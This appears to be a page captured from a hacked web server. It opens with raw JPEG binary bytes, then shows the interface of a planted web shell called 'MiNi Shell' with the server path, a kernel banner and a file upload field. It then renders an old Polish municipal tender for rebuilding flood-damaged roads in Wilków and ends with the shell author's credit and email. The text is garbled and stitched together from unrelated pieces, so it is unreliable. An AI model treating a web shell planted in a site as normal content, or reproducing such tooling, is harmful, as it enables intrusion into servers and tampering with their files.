JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120726/271322-N-2012.html

<p class="kh_header"><b>Wilków: Odbudowa dróg gminnych zniszczonych w trakcie powodzi w 2010r - III etap.</b><br>
<b>Numer ogłoszenia: 271322 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wilków , Wilków 62A, 24-313 Wilków, woj. lubelskie, tel. 081 8281424, faks 081 8281050.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilkow.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa dróg gminnych zniszczonych w trakcie powodzi w 2010r - III etap..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Odbudowa dróg zniszczonych w trakcie powodzi w 2010r - III etap.
Zakres prac obejmuje.
1. Odbudowa  drogi gminnej w m. Urządków  na odcinku   250,50mb
W tym
1.A. Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 55  od km 0+000 do km 0+225,50 w miejscowości Urządków.

Zakres prac
-   Roboty pomiarowe przy liniowych robotach ziemnych- drogach, w terenie równinnym  - 0,2255km.
-   Rozebranie nawierzchni z płyt wielootworowych ażurowych, o powierzchni płyt do
1,0 m2 -JOMBA  -  15,75m2.
-   Rozebranie  przepustów  rurowych -część przelotowa betonowych o średnicy      50 cm  -  5,00m.
-   Wywiezienie gruzu samochodem samowyładowczym przy ręcznym załadowaniu i mechanicznym rozładunku na odl. 5 km  -  2,83m3.
-   Wykopy jamiste ze skarpami ,o głębokości do 1,5 m, w gruncie  kat. III, pod przepust -wykop trapezowy  -  4,88m3.
-   Dopłata do wykopów liniowych lub jamistych ze skarpami za każde dalsze rozpoczęte 0,5 m głębokości ponad 1,5 m, w gruncie  kat. III  -  4,88m2.
-   Odspojenie i przewóz gruntu taczkami na odl. do 20 m w gr. kat. III, z wbudowaniem w nasyp - rów dopływowy i odpływowy , na odległość po 5,0 dna rowu i skarpy  -  4,70m3.
-   Ręczne formowanie nasypów w gruncie  kat. III-IV ułożonego wzdłuż nasypu  -  9,58m3.
-   Wyłożenie geowłókniny separacyjnej szer. 6 m na gruntach o umiarkowanej nośności jako umocnienie czaszy i skarp składowisk oraz nasypów włókniną syntetyczną wraz z zamknięciem od góry  -  73,20m2.
-   Ławy fundamentowe przepustów rurowych  pod zjazdami z kruszywa łamanego  4/31,5 mm, gr. 20 cm, o wymiarach 1,0 x 7,0  -  1,40m3.
-   Wykonanie podsypki piaskowej pod montowany przepust jako wyłożenie podłoży pod kanały z materiałów sypkich o gr. 10 cm, o wymiarach 1,0 x 8,0  -  0,80m3.
-   Część przelotowa przepustu o śr. 80 cm z rur polietylenowych PEHD SN6 -6KPa karbowane spiralnie  -  8,00m.
-   Zasypywanie wykopów ze skarpami, w  gruncie  kat. I-III, z przerzutem na odl. do 3 m, z zagęszczeniem warstwami do 30 cm wraz z kosztami materiału -gruby piasek, pospółka 0+30 mm  -  4,88m3.
-   Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane ręcznie w gruncie  kat.II-IV, na szer. 3 m  -  16,20m2.
-   Warstwa dolna podbudowy z kruszyw łamanych 0-31,5 mm, gr. 20 cm -odtworzenie konstrukcyjnej i istniejącej  -  16,20m2.
-   Umocnienie skarp wykopów do 1,5 m w obrębie wlotu i wylotu przepustu kamieniem brukowym lub kamieniem łamanym o wym. 16-20 cm, na podsypce cementowo - piaskowej z zalaniem spoin zaprawą cementową  -  4,43m2.
-   Umocnienie dna rowu na wlocie i wylocie płytami prefabrykowanymi JOMB na dł. po 5 m, szer. 0,75 m, na podsypce cementowo - piaskowej, gr. 10 cm  -  7,50m2.
-   Umocnienie skarp rowu do i odpływowego płytami typu ECO o wym. 40x60 cm, na szer. skarpy 80 cm, na podsypce cementowo - piaskowej, gr. 10 cm   -  16,00m2.
-   Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane mechanicznie w gruncie kat.II-VI przy użyciu  równiarki i walca statycznego, na szer. projektowanej podbudowy  -  653,95m2.
-   Podbudowy z tłucznia, przy grubości górnej warstwy po zagęszczeniu 10 cm  -  653,95m2.
-  Mechaniczne oczyszczenie nawierzchni nieulepszonej -tłuczeń  -  653,95m2.
-   Skropienie nawierzchni drogowych asfaltem - emulsją asfaltową , jednokrotnie,
pod warstwę wyrównawczą w ilości 0,7 kg-m2  -  653,95m2.
-   Mechaniczne wyrównanie istniejącej podbudowy mieszanką mineralno-asfaltową Standard II, 0-16 mm, żwirowo-grysową , dla KR-1-2, wg PN-S-96025-2000, transportowaną na odległość 5km samochodem samowyładowczym 10-15 t, w ilości średnio 75 kg-m2, gr. 3cm  -  48,30T.
-   Dodatek za transport mieszanki mineralno- bitumicznej za każdy następny 1 km ponad 5 km samochodem samowyładowczym ponad 10 do 15 t, na odl. 45 km  -  48,30T.
-   Warstwa ścieralna nawierzchni ,wykonana z mieszanek mineralno-asfaltowych Standard II, transportowanych samochodem samowyładowczym do 15 t na odl.5 km, 100 kg-m2, o grubości warstwy po zagęszczeniu 4 cm, gr. 0-12,8 mm, wg PN-S-96025-2000 -  608,85m2.
-   Dodatek za transport mieszanki mineralno- bitumicznej - za każdy dalszy 1 km transportu ponad 5 km samochodem samowyładowczym do 15 t, na odl. 45 km  -  60,88T.
-   Podbudowy na poboczach -opaskach z kruszywa łamanego od 0 do 31,5 mm, stabilizowanego mechanicznie o szer. 0,15 m obustronnie gr. średnio 17 cm  -  67,65m2.

1.B. Włączenie do drogi powiatowej na odcinku 25 mb.
Zakres prac
-   Roboty pomiarowe przy liniowych robotach ziemnych -drogach w terenie równinnym  - 0,025km.
-   Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane mechanicznie w gruncie kat.III-IV przy użyciu walca statycznego  -  142,50m2.
-   Podbudowa z tłucznia, przy grubości górnej  warstwy po zagęszczeniu  10 cm  -  142,50m2.
-   Mechaniczne oczyszczenie nawierzchni  nieulepszonej - tłuczeń  -  142,50m2.
-   Skropienie nawierzchni drogowych asfaltem  -emulsją asfaltową  jednokrotnie pod warstwę wyrównawczą w ilości 0,7 kg-m2  -  142,50m2.
-   Mechaniczne wyrównanie istniejącej podbudowy mieszanką mineralno-asfaltową Standard II 0-16 mm, żwirowo - grysową, dla KR-1-2, wg PN-S-96025-2000, transportowaną na odległość 5km samochodem samowyładowczym 10-15 t, w ilości średnio 75 kg-m2 - 3 cm  -  10,50T.
-   Dodatek za transport mieszanki mineralno- asfaltowej za każdy następny 1 km ponad 5 km samochodem samowyładowczym ponad 10 do 15 t na odległość 45 km  -  10,50T.
-   Warstwa ścieralna nawierzchni, wykonana z mieszanek mineralno-asfaltowych Standard II, transportowanych samochodem samowyładowczym od 10 do 15 t na odl.5 km, o grubości warstwy po zagęszczeniu  4 cm -100 kg-m2, o frakcji 0-12,8 mm wg PN-S-96025-2000  -  137,50m2.
-  Dodatek za transport mieszanki mineralno- asfaltowej - za każdy dalszy 1 km transportu ponad 5 km samochodem samowyładowczym do 15 t, na odległość 45 km  -  13,75T.
-  Podbudowa na poboczach -opaskach z kruszywa łamanego od 0 do 31,5 mm, stabilizowanego mechanicznie, o szer. 0,15 m, obustronnie o gr. średnio 17 cm, od km 0+000 do km 0+025, strona lewa i prawa  -  7,64m2.
-   Słupki do pionowych znaków drogowych, stalowe, z rur o średnicy 50 mm  -  6szt.
-   Tablice ostrzegawcze znaków drogowych trójkątne o boku 90 cm A-30 -inne niebezpieczeństwa  - 1szt.
-   Tablice okrągłe znaków drogowych, o średnicy 80 cm B-20 - STOP - 1 szt., B-33 -30 km-godzinę - 1 szt. Razem - 2 szt.
-   Tablice kwadratowe znaków drogowych, o boku 60 cm D-1 -droga główna - 2 szt., T-6a tablica pod znak - 2 szt. T-6c tablica pod znak - 1 szt. Razem - 5 szt.
-   Tablice pod znaki drogowe  T-3 -Piesi - 1 szt. -0,25 x 0,70  T-2 -1 km - 1 szt. -0,25 x 0,70  -  Razem 2szt.
-   Tablice prowadzące o wym. 1,80 x 0,60    U3d  -  1szt.
  
2. Odbudowa drogi gminnej w m. Wilków na odcinku 471,50mb
W tym
2.A. Odbudowa  drogi gminnej zlokalizowanej na działce o numerze ewidencyjnym 693  od km 0+000 do km 0+468,50 w miejscowości Wilków.
Zakres prac.
-   Roboty pomiarowe przy liniowych robotach ziemnych- drogach, w terenie równinnym  - 0,4685km.
-   Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane mechanicznie w gruncie kat.II-VI przy użyciu  równiarki i walca statycznego, na szer. projektowanej podbudowy  -  1 546,05m2.
-   Podbudowy z żużla stalowniczego 10-60 mm, przy grubości dolnej warstwy po zagęszczeniu 12 cm, szer. 3,30 m  -  1 546,05m2.
-   Podbudowa z żużla stalowniczego 0-10 mm, przy grubości górnej warstwy po zagęszczeniu 8 cm i szer. 3,20 m  -  1 499,20m2.
-   Roboty ziemne wykonywane koparkami przedsiębiernymi, z transportem urobku samochodami samowyładowczymi -wykopanie poboczy ziemnych szer. po 50 i 40 cm, gr. 15 cm i 20cm, na odległość do 1 km  -  74,96m3.
-   Dopłata za każdy dalszy rozpoczęty 1 km odległości transportu ponad 1 km, przy przewozie po drogach o nawierzchni utwardzonej, gruntu kat.I-IV, wywrotką na odl. 5 km  -  74,96m3.
-   Ręczne formowanie nasypów warstwami grub. do 30 cm, z wyk .koniecznych przerzutów, przy dostarczaniu ziemi samochodami  samowyładowczymi, w gruncie kat. I-II, wraz z zagęszczeniem  -  74,96m3.

1.B. Włączenie do drogi powiatowej na odcinku 3,00 mb.
Zakres prac
-   Roboty pomiarowe przy liniowych robotach ziemnych -drogach w terenie równinnym  - 0,003km.
-   Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane mechanicznie w gruncie kat.III-IV przy użyciu walca statycznego  -  20,65m2.
-   Podbudowa z żużla stalowniczego 10-60  mm, przy grubości dolnej warstwy po zagęszczeniu  12cm, jako warstwa dolna  -  20,65m2.
-   Podbudowy z żużla stalowniczego 0-10 mm, przy grubości górnej warstwy po zagęszczeniu  8 cm i szer. 3,20 m  -  20,35m2.
-   Roboty ziemne wykonywane koparkami przedsiębiernymi, z transportem urobku samochodami samowyładowczymi na odległość do 1 km, wykonywanie poboczy ziemnych szer. 40 cm, gr. 20 cm  -  1,26m3.
-   Dopłata za każdy dalszy rozpoczęty 1 km odległości transportu ponad 1 km, przy przewozie po drogach o nawierzchni utwardzonej, gruntu kat.I-IV, s. wywrotką, na odl. 5 km  -  1,26m3.
-   Ręczne formowanie nasypów warstwami z wyk. koniecznych przerzutów, przy dostarczaniu ziemi samochodami samowyładowczymi, w gruncie  kat. I-II wraz z zagęszczeniem  -  1,26m3.
-   Słupki do pionowych znaków drogowych, stalowe, z rur o średnicy 50 mm  -  3szt.
-   Tablice okrągłe znaków drogowych, o średnicy 80 cm B-20 - STOP - 1 szt 
Razem 1szt.
-   Tablice kwadratowe znaków drogowych, o boku 60 cm D-1 -droga główna - 2 szt. Razem - 2 szt.

Szczegóły techniczne wykonania określają - projekt budowlano wykonawczy  i Szczegółowe Specyfikacje Techniczne   stanowiące załącznik do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.32.00-1, 45.23.32.20-7, 45.23.30.00-9, 45.11.10.00-8, 45.23.21.30-2, 45.23.32.90-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium: 
Ustala się wadium dla poszczególnych dróg  w wysokości:
A. Odbudowa drogi gminnej w m.Urządków  - 1 000,00 złotych- słownie: jeden tysiąc złotych 00/100
B. Odbudowa drogi gminnej w m Wilków - 1 000,00 złotych - słownie: jeden tysiąc złotych 00/100.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kierownik budowy winien posiadać uprawnienia budowlane w zakresie budownictwa drogowego  , oraz wpis   do Okręgowej Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien  udokumentować wybudowanie  w okresie ostatnich pięciu lat co najmniej 3 /trzech/ dróg - każda o długości minimum 300mb i  wartości minimum 60 000złotych w technologii: podbudowa + nawierzchnia bitumiczna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewidział możliwość dokonania zmian postanowień zawartej umowy                    w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
2. Zamawiający dopuszcza możliwość zmiany ustaleń niniejszej umowy w stosunku do treści oferty Wykonawcy w następujący zakresie:
1) W stosunku do zmiany terminu wykonania przedmiotu zamówienia 
a) jeżeli wystąpią warunki atmosferyczne odbiegające od typowych, uniemożliwiające wykonanie przedmiotu zamówienia
b) w przypadku wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu zamówienia 
     c)jeżeli wystąpi przerwa w realizacji przedmiotu zamówienia z przyczyn nieleżących po stronie Wykonawcy
2)W stosunku do zmiany osób odpowiedzialnych za kierowanie robotami budowlanymi oraz nadzór nad tymi robotami- zmiana osób może nastąpić, po wcześniejszej akceptacji przez Zamawiającego, pod warunkiem, że wskazane osoby będą posiadały uprawnienia tożsame      z wymaganymi przez Zamawiającego.
3)W stosunku do zmiany zgłoszonych w   formularzu ofertowym podwykonawców- pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.pl zakładka ogłoszenia przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać również bezpośrednio w siedzibie zamawiającego , lub otrzymać pocztą za pobraniem..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2012 godzina 10:00, miejsce: Gmina Wilków
Wilków 62A  24-313 Wilków
Pokój nr 107 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com